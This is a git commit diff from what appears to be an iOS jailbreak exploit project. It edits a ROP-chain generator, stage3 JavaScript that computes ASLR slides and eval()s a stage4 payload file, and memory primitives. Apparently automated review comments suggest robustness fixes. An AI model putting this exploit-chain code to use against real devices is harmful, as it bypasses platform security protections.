| author | spv420 <spv@spv.sh> | 2022-07-31 00:52:32 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-31 00:52:32 -0400 |
| commit | ff25122977689598faf9c8782b9e286040cce819 (patch) | |
| tree | ca1ac70ee2394035fb38bcdd50e7c8a68e89c942 /src | |
| parent | aa680a3db6983197bee977ca02b4d29499ccbd8f (diff) | |
yahtzee
Diffstat (limited to 'src')
| -rw-r--r-- | src/gen/stage2.c | 7 | ||||
| -rw-r--r-- | src/js/main.js | 23 | ||||
| -rw-r--r-- | src/js/primitives/mem.js | 2 | ||||
| -rw-r--r-- | src/stage4/main.js | 7 |
4 files changed, 25 insertions, 14 deletions
diff --git a/src/gen/stage2.c b/src/gen/stage2.c
index 63dccc1..1b18d16 100644
--- a/src/gen/stage2.c
+++ b/src/gen/stage2.c
@@ -281,13 +281,14 @@ rop_chain_shit gen_rop_chain(uint32_t base,
 // CALL_4_ARG_L2_0(base + 0x9ad8c, LOG_SYSLOG, base + we_out_here_addr);
- /* allocate memory for file read later */
+/*
+ /* allocate memory for file read later *\/
 CALL_1ARG(base + malloc_addr, 0x100000);
 STR_R0(base + reserve_addr);
 MOV_R1_R0();
- /* output malloc string */
- CALL_1ARG(base + printf_addr, base + malloc_status_addr);
+ /* output malloc string *\/
+ CALL_1ARG(base + printf_addr, base + malloc_status_addr);*/
 /* calculate dyld_shared_cache slide */
 MOV_R0(0 - (0x20000000 + scprefcreate_dsc_offset));
diff --git a/src/js/main.js b/src/js/main.js
index 905c4ef..6c1c9a5 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -48,7 +48,8 @@ var kCFBooleanFalse;
 var kCFPreferencesAnyUser;
 var kCFPreferencesCurrentHost;
 var kIOMasterPortDefault = NULL;
-var options = {};
+var p0laris = {};
+p0laris.options = {};
 var sanity_port = 0;
 var MACH_PORT_RIGHT_RECEIVE = 0x1;
@@ -97,11 +98,16 @@ function parse_nvram_options() {
 for (var i = 0; i < p0laris_options_buf.length; i++) {
 p0laris_options_js_str += String.fromCharCode(p0laris_options_buf[i]);
 }
- options = JSON.parse(p0laris_options_js_str);
+ p0laris.options = JSON.parse(p0laris_options_js_str);
 }
 }
 }
+function p0laris_object_general() {
+ p0laris.dyld_shc_slide = get_dyld_shc_slide();
+ p0laris.racoon_slide = get_our_slide();
+}
+
 function main() {
 /*
 * get slide and calculate slid base
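Review bot: The `*\/` sequences in the newly commented-out block are not escapes in C: the block comment opened by the added `/*` runs until the first real `*/`, which is the one appended after `malloc_status_addr);`, and the inner `/* allocate …` only survives because a comment-start inside a comment is ignored (compilers warn about exactly this under -Wcomment). Disabling a stretch of generated-chain code is clearer and nest-safe with the preprocessor: replace the opening `/*` line with `#if 0`, drop the trailing `*/` and add an `#endif` line after the printf call, leaving the original comments untouched. gen_rop_chain starts before and continues after this hunk, so the effect on later steps that may rely on the skipped allocation is not visible here.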
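Review bot: `p0laris.options = JSON.parse(p0laris_options_js_str)` has no error handling, so a malformed or truncated value in the NVRAM buffer throws a SyntaxError out of parse_nvram_options() and, since main() calls it unguarded, ends the run before stage4 is ever loaded; because p0laris.options already defaults to `{}`, a guard such as `try { p0laris.options = JSON.parse(p0laris_options_js_str); } catch (e) { printf("[!] bad p0laris options, using defaults\n"); }` keeps the defaults instead. The new `p0laris_object_general()` also deserves a one-line header comment, e.g. `/* populate the shared p0laris object with the slides computed in stage3 so later stages can read them */`. parse_nvram_options() starts outside the hunk and main() continues past it.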
@@ -121,16 +127,16 @@ function main() {
 syslog(LOG_SYSLOG, "we out here");
 syslog(LOG_SYSLOG, "stage3");
- puts("we out here");
- puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
-
- var dyld_shc_slide = get_dyld_shc_slide();
+ puts("[*] we out here");
+ puts("[*] landed in stage3");
 setup_fancy_rw();
 parse_nvram_options();
+
+ p0laris_object_general();
- if (options["sleep_spin"] === true) {
+ if (p0laris.options.sleep_spin === true) {
 while (1) {
 sleep(3600);
 }
@@ -138,6 +144,7 @@ function main() {
 var stage4_bin = malloc(0x400000);
+ printf("[*] loading stage4...\n");
 var fd = open("/var/root/stage4.js", O_RDONLY, 0);
 var bytes_read = read(fd, stage4_bin, 0x400000);
 var stage4_bin_buf = read_buf(stage4_bin, bytes_read);
@@ -146,7 +153,7 @@ function main() {
 stage4_js_str += String.fromCharCode(stage4_bin_buf[i]);
 }
- printf("stage4 time baby\n");
+ printf("[*] entering stage4...\n");
 eval(stage4_js_str);
 exit(main());
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index d664e7b..f6a0f8b 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -226,7 +226,7 @@ function init_sptr_heap() {
 sptr_size = 0x1000000;
 sptr_len = 0;
- calls4arg("printf\0", sptr("sptr_heap=%p\n"), global_sptr_addy, 0, 0);
+ calls4arg("printf\0", sptr("[*] sptr_heap=%p\n"), global_sptr_addy, 0, 0);
 return global_sptr_addy;
 }
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 4947a77..328bb0a 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -1,6 +1,9 @@
 function main() {
- printf("landed in stage4\n");
- syslog(LOG_SYSLOG, "we out here in stage 4");
+ printf("[*] landed in stage4\n");
+ syslog(LOG_SYSLOG, "we out here");
+
+ printf("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide);
+ printf("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide);
 return 0;
 }
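Review bot: The local `var dyld_shc_slide` is dropped in favor of `p0laris.dyld_shc_slide`, but main() continues well past this hunk, so any remaining read of the old local further down would now surface only as a runtime ReferenceError rather than as a visible diff line; worth grepping the rest of main() (and the code it eval()s) before merging. A small style point: the new `p0laris_object_general();` call sits directly against the `if` that consumes it, and a blank line after it would match the spacing used around the other setup calls. main() starts and ends outside the hunk.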
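Review bot: The new progress message is printed before `open("/var/root/stage4.js", O_RDONLY, 0)`, yet neither `fd` nor `bytes_read` is checked, so when the file is missing the read runs on an invalid descriptor and `read_buf(stage4_bin, bytes_read)` is called with whatever read() returned; a matching failure line such as `if (fd < 0) { printf("[!] open stage4.js failed\n"); return 1; }` after the open, plus a similar guard on `bytes_read`, would make the added logging actually diagnostic. This assumes the open/read wrappers mirror the libc return conventions (negative on failure) — confirm against the primitives under src/js/primitives. main() continues outside the hunk.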
\ No newline at end of file |
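Review bot: The syslog message is changed to `"we out here"`, which is the exact string stage3 already logs at the top of main() in src/js/main.js, so the log line no longer identifies which stage emitted it; keeping a stage marker, e.g. `syslog(LOG_SYSLOG, "we out here in stage4");`, preserves the distinction the old message had. The two new printf lines read `p0laris.dyld_shc_slide` and `p0laris.racoon_slide`, which are only defined because stage3 eval()s this file after `p0laris_object_general()` has run; a comment at the top of main() such as `/* p0laris is created and populated by stage3 (src/js/main.js) before this file is eval'd */` would record that dependency for anyone running stage4 on its own. Whether `%08x` is the right width depends on how the printf primitive marshals JS numbers — presumably 32-bit given the uint32_t base used in stage2.c, but confirm.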
